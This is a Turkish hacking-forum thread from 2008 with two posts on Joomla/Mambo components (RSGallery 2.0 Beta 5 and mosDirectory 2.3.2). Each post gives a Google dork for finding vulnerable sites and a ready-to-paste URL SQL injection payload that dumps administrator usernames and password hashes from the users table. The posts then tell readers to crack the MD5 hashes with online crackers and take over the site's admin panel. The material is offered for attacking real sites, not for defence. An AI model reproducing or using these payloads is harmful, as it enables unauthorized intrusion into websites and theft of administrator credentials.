HACKTAN YENİ PCKOPAT
Mesaj Sayısı : 6 RUH HALİ : SADECE BU KONUDA AŞAĞIDAKİ KADAR TEŞEKKÜR EDİLDİ : <div class="js-kit-rating" view="score"path="" title="" permalink=""></div><script src="http://js-kit.com/ratings.js"></script> TAKIM : Kayıt tarihi : 02/09/08
| Konu: Mambo/Joomla Component Rsgallery 2.0 Beta 5 Remote SQL Inje Salı Eyl. 02, 2008 3:23 pm | |
| Dork : option=com_rsgallery Veya inurl:index.php?option=com_rsgallery
Site Sonuna : index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Admin K.adı ve md5hashları alırsınız onuda online md5 hash kırıcıları ile kırarak admin paneline ulaşabilirsiniz. _________________ | |
|
HACKTAN YENİ PCKOPAT
Mesaj Sayısı : 6 RUH HALİ : SADECE BU KONUDA AŞAĞIDAKİ KADAR TEŞEKKÜR EDİLDİ : <div class="js-kit-rating" view="score"path="" title="" permalink=""></div><script src="http://js-kit.com/ratings.js"></script> TAKIM : Kayıt tarihi : 02/09/08
| Konu: Geri: Mambo/Joomla Component Rsgallery 2.0 Beta 5 Remote SQL Inje Salı Eyl. 02, 2008 3:23 pm | |
| ################################################## ######################################### ### Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability ### ###
### goole araması : inurl:index.php?option=com_directory ### ### sitenin sonuna gelecek olan kod: index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/* ### ### ### ################################################## #########################################
bu açıkla size sitenin kullanıcı adı ve şifresini veriir adminin sifre md5 ile şifrelenmiş bir şekilde olur yani 32 karekter bunu milw0rm yada başka bir md5 kırıcı ile kırıp admin panaline igrersiniz ve site elinizde | |
|